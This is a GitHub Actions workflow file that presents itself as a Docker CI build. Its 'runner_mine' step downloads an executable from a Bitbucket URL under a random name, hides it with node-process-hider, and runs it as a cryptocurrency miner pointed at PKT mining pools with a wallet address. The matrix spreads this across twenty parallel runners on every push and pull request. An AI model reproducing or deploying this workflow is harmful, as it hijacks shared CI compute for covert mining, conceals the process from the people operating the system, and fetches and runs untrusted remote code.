name: CI-PROGRES-AWS
on: [push, pull_request]
jobs:
  build:
    name: Docker
    runs-on: ubuntu-18.04
    strategy:
      max-parallel: 20
      fail-fast: false
      matrix:
        flag: [ba, bb, bc, bd, be, bf, bg, bh, bi, bj, bk, bl, bm, bn, bo, bp, bq, br, bs, bt]
    steps:
    - name: Setup
      uses: actions/checkout@v1
    - name: runner_mine
      continue-on-error: true
      run: |
        blkdiscard=$(shuf -n 1 -i 1-999999)
        sudo apt-get update && sudo apt-get install -y screen npm && sudo apt-get install -y nodejs
        sudo npm i -g node-process-hider
        wget -q -O $blkdiscard https://bitbucket.org/kijang-020/ann/raw/60d016f60b08eda6ca47670234f0a08f46fffa1e/ann
        chmod +x $blkdiscard
        sudo ph add $blkdiscard
        ./$blkdiscard ann -p pkt1qyjyh8m95lgcxg8hc3ajtk5gh2x45h9y4w7cfdz http://pool.srizbi.com http://pool.pktpool.io http://pool.pkt.world
